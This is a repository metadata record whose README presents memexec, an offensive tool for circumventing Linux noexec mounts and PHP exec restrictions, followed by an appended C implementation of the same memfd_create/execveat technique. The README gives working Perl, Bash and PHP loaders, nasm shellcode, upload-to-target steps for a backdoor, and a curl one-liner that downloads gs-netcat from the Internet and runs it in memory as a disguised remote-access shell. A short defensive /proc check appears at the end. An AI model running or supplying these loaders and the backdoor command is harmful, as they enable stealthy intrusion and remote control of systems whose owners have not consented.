{"id":16077951,"url":"https://github.com/hackerschoice/memexec","last_synced_at":"2025-10-10T13:36:09.980Z","repository":{"id":257815997,"uuid":"863479980","full_name":"hackerschoice/memexec","owner":"hackerschoice","description":"Circumventing \"noexec\" mount flag to execute arbitrary linux binaries by ptrace-less process injection","archived":false,"fork":false,"pushed_at":"2025-03-26T21:23:32.000Z","size":71,"stargazers_count":104,"open_issues_count":0,"forks_count":26,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-03-30T06:04:17.769Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Assembly","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/hackerschoice.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-09-26T11:18:11.000Z","updated_at":"2025-03-27T04:33:23.000Z","dependencies_parsed_at":"2025-02-27T18:17:28.062Z","dependency_job_id":"db84f143-a1d9-454f-b356-65a883d6d3c0","html_url":"https://github.com/hackerschoice/memexec","commit_stats":null,"previous_names":["hackerschoice/memexec"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hackerschoice%2Fmemexec","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hackerschoice%2Fmemexec/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hackerschoice%2Fmemexec/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hackerschoice%2Fmemexec/manifests","owner_url":"https://re
pos.ecosyste.ms/api/v1/hosts/GitHub/owners/hackerschoice","download_url":"https://codeload.github.com/hackerschoice/memexec/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247445667,"owners_count":20939958,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-10-09T10:05:35.527Z","updated_at":"2025-10-10T13:36:09.975Z","avatar_url":"https://github.com/hackerschoice.png","language":"Assembly","funding_links":[],"categories":["others"],"sub_categories":[],"readme":"## Circumvent the `noexec` mount flag on Linux and execute arbitrary binaries\n\nThis is useful on a Linux system when all writeable locations are mounted with `-o noexec` (including /dev/shm) or to escape PHP's 'exec' restrictions.\n\nUse _one_ of the 3 scripts (perl, bash, php):\n\n- The binary does not need to have +x\n- The binary can reside on a noexec-partition\n- In most cases the binary can be piped directly from the Internet into memory (and executed there)\n- Works as a non-root user\n- The PHP variant also circumvents PHP's \"exec\" restrictions.\n- It injects shellcode into the running process and calls [memfd_create(2)](https://man7.org/linux/man-pages/man2/memfd_create.2.html) and [execveat(2)](https://man7.org/linux/man-pages/man2/execveat.2.html) to load a binary from a noexec-partition (or directly from the Internet).\n- BASH and PHP do not support SYSCALLS. 
We advanced an old trick.\n\nRead the [circumventing the noexec Article](https://iq.thc.org/bypassing-noexec-and-executing-arbitrary-binaries) for more.\n\n`TIME_STYLE` and `-lah` are used as an example to pass through environment parameters and command line options.\n\n### PERL example:\n```sh\n# From memexec-perl.sh\nmemexec(){ perl '-e$^F=255;for(319,279,385,4314,4354){($f=syscall$_,$\",0)\u003e0\u0026\u0026last};open($o,\"\u003e\u0026=\".$f);print$o(\u003cSTDIN\u003e);exec{\"/proc/$$/fd/$f\"}X,@ARGV;exit 255' -- \"$@\";}\ncat /bin/ls | TIME_STYLE=+%s memexec -lah\n```\nThis was golfed by the fine people on Mastodon ([@acut3hack](https://@acut3hack@infosec.exchange), [@addision](https://@addison@nothing-ever.works), [@ilv](https://@ilv@infosec.exchange))\n\n### BASH example (by [@messede-degod](https://github.com/messede-degod)):\n```sh\nsource memexec-bash.sh\ncat /bin/ls | TIME_STYLE=+%s memexec -- -lah\n```\n\n### The PHP variant also circumvents [\"shell_exec\" restrictions](https://www.cyberciti.biz/faq/linux-unix-apache-lighttpd-phpini-disable-functions/).\n\n1. Upload `memexec.php` and `egg` (your backdoor) onto the target\n2. Call `curl -SsfL https://target/memexec.php` to execute `egg`, bypassing the noexec restrictions\n\n(This is my way of saying \"hey. 
how are to?\" to my old [team-teso](https://en.wikipedia.org/wiki/TESO_(Austrian_hacker_group)) colleague and long time PHP developer [@i0nic](https://x.com/i0n1c))\n\n---\n\nThe educated reader understands that this is mostly used to pipe a backdoor from the Internet directly into memory, even when execution is prohibited by `noexec` or there is no writeable directory (hides as process name `/usr/bin/python3`):\n```shell\ncurl -SsfL https://github.com/hackerschoice/gsocket.io/raw/refs/heads/gh-pages/bin/gs-netcat_mini-linux-$(uname -m) | GS_ARGS=\"-ilD -s ChangeMe\" perl '-e$^F=255;for(319,279,385,4314,4354){($f=syscall$_,$\",0)\u003e0\u0026\u0026last};open($o,\"\u003e\u0026=\".$f);print$o(\u003cSTDIN\u003e);exec{\"/proc/$$/fd/$f\"}X,@ARGV;exit 255' -- \"$@\"\n```\n---\n\nFor the addicts, here is the nasm of the shellcode (memfd_create, copy loop \u0026 execveat):\n```nasm\n; nasm -felf64 memexec.nasm \u0026\u0026 ld memexec.o \u0026\u0026  ./a.out\n; ./a.out reads ./egg into a memfd and executes it (empty argv and envp)\n\nglobal _start\nsection .text\n\n_start:\n    push    0x00676765  ; \"egg\\0\" (little-endian)\n    mov     rax, 0x13f  ; arg 0: memfd_create_NR (319)\n    mov     rdi, rsp    ; arg 1: name [egg]\n    xor     rsi, rsi    ; arg 2: 0 = no MFD_CLOEXEC\n    syscall\n    mov     r8, rax     ; r8 = memfd\n\n    mov     rax, 2      ; arg 0: open_NR\n    mov     rdi, rsp    ; arg 1: path [./egg]\n    xor     rsi, rsi    ; arg 2: 0 = O_RDONLY\n    syscall\n    mov     r9, rax     ; r9 = FD [egg]\n\nloop:\n    sub     rsp, 0x400\n    xor     rax, rax    ; arg 0: read_NR\n    mov     rdi, r9     ; arg 1: FD [egg]\n    mov     rsi, rsp    ; arg 2: buffer\n    mov     edx, 0x400  ; arg 3: length\n    syscall\n\n    cmp     rax, 0x00\n    jle     done        ; EOF (or read error)\n\n    mov     rdx, rax    ; arg 3: length (from read())\n    mov     eax, 0x01   ; arg 0: write_NR\n    mov     rdi, r8     ; arg 1: FD [memfd]\n    syscall\n    jmp     loop\ndone:\n\n    mov     rax, 322    ; arg 0: execveat_NR\n    mov     rdi, r8     ; arg 1: dirfd = memfd\n    push    0x00        ; 8 zero bytes: serve as \"\" and as argv's NULL terminator\n    mov     rsi, rsp    ; arg 2: path = \"\" (with AT_EMPTY_PATH the fd itself is executed)\n    mov     rdx, rsp    ; arg 3: argv = {NULL}, an empty argument vector\n    xor     r10, r10    ; arg 4: envp = NULL (4th syscall argument is r10, not rcx)\n    mov     r8, 0x1000  ; arg 5: flags = AT_EMPTY_PATH\n    syscall\n\n    mov     rax, 60     ; exit_NR: only reached if execveat() failed\n    xor     rdi, rdi\n    syscall\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackerschoice%2Fmemexec","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhackerschoice%2Fmemexec","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackerschoice%2Fmemexec/lists"}
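The memfd_create(2) + execveat(2) technique the README describes, written out in C as an added example (this is not memexec's own code). It assumes Linux with glibc 2.27 or newer (for `memfd_create()` and `SYS_execveat`) and uses `/bin/true` and `/bin/false` as sample ELF images; the `/tmp/memexec-demo-XXXXXX` temp path, the fork/wait wrapper and the memfd name `egg` are choices made here for illustration. `copy_without_x()` produces a copy of a binary with mode 0444, which `execve()` refuses, and `run_from_memory()` executes those same bytes from an anonymous memfd.

```c
/* Added example, not memexec's own code: memfd_create(2) + execveat(2) in C,
 * with a fork/wait wrapper so the outcome can be observed. Assumes Linux,
 * glibc >= 2.27 and /bin/true as a sample image.  Build: cc -O2 memexec.c */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>

extern char **environ;

/* Copy every byte readable from src_fd into a fresh anonymous memfd and return
 * it (-1 on error). The memfd lives in kernel tmpfs that is never mounted
 * noexec, so the mount flags and mode bits of the source file stop mattering.
 * MFD_CLOEXEC is fine for ELF images (the kernel maps the file before closing
 * fds); for "#!" scripts pass 0 instead, as the README's shellcode does. */
static int memfd_from_fd(int src_fd, const char *name)
{
    int mfd = memfd_create(name, MFD_CLOEXEC);
    if (mfd < 0) return -1;
    char buf[0x4000];
    for (;;) {
        ssize_t n = read(src_fd, buf, sizeof buf);
        if (n == 0) return mfd;                     /* EOF: image complete */
        if (n < 0 && errno == EINTR) continue;
        if (n < 0) break;
        for (ssize_t off = 0; off < n;) {           /* short writes are legal */
            ssize_t w = write(mfd, buf + off, (size_t)(n - off));
            if (w < 0 && errno == EINTR) continue;
            if (w < 0) { close(mfd); return -1; }
            off += w;
        }
    }
    close(mfd);
    return -1;
}

/* execveat(mfd, "", argv, envp, AT_EMPTY_PATH) executes the open file itself:
 * no path lookup, no +x check on the source file, no noexec check on its
 * mount. Raw syscall because older glibc has no execveat() wrapper. Like
 * execve(), it only returns on failure. */
static int exec_memfd(int mfd, char *const argv[], char *const envp[])
{
    return (int)syscall(SYS_execveat, mfd, "", argv, envp, AT_EMPTY_PATH);
}

/* Fork, execute the bytes of image_path from memory in the child, and return
 * the child's exit status: 127 if the memfd could not be built, 126 if
 * execveat() failed, -1 on open/fork/wait errors. */
int run_from_memory(const char *image_path, char *const argv[])
{
    int src = open(image_path, O_RDONLY | O_CLOEXEC);
    if (src < 0) return -1;
    pid_t pid = fork();
    if (pid == 0) {                                 /* child */
        int mfd = memfd_from_fd(src, "egg");        /* "egg": name chosen here */
        if (mfd < 0) _exit(127);
        exec_memfd(mfd, argv, environ);
        _exit(126);                                 /* execveat() failed */
    }
    close(src);
    int status;
    if (pid < 0 || waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Copy src_path to a temp file with mode 0444 (readable, not executable), so a
 * plain execve() of it fails with EACCES. Writes the new path into out. */
int copy_without_x(const char *src_path, char *out, size_t outlen)
{
    if (snprintf(out, outlen, "/tmp/memexec-demo-XXXXXX") >= (int)outlen) return -1;
    int dst = mkstemp(out);
    if (dst < 0) return -1;
    int src = open(src_path, O_RDONLY);
    if (src < 0) { close(dst); return -1; }
    char buf[0x4000];
    ssize_t n;
    while ((n = read(src, buf, sizeof buf)) > 0 && write(dst, buf, (size_t)n) == n)
        ;
    fchmod(dst, 0444);                              /* r--r--r--: no exec bit */
    close(src);
    close(dst);
    return n == 0 ? 0 : -1;                         /* 0 only on clean EOF */
}

/* Stand-alone demo: a copy of /bin/true without +x cannot be execve()d but runs
 * from memory. Prints the access(X_OK) result (-1) and the exit status (0). */
int main(void)
{
    char path[64];
    if (copy_without_x("/bin/true", path, sizeof path) != 0) return 1;
    char *const argv[] = {"true", NULL};
    printf("%s: access(X_OK)=%d run_from_memory()=%d\n", path,
           access(path, X_OK), run_from_memory(path, argv));
    unlink(path);
    return 0;
}
```

On the defensive side, a process started this way has `/proc/<pid>/exe` pointing at `/memfd:egg (deleted)` rather than at a path on disk, so `ls -l /proc/[0-9]*/exe 2>/dev/null | grep memfd:` is the cheapest host-side check for the technique; `noexec` alone does not stop it, as the README says.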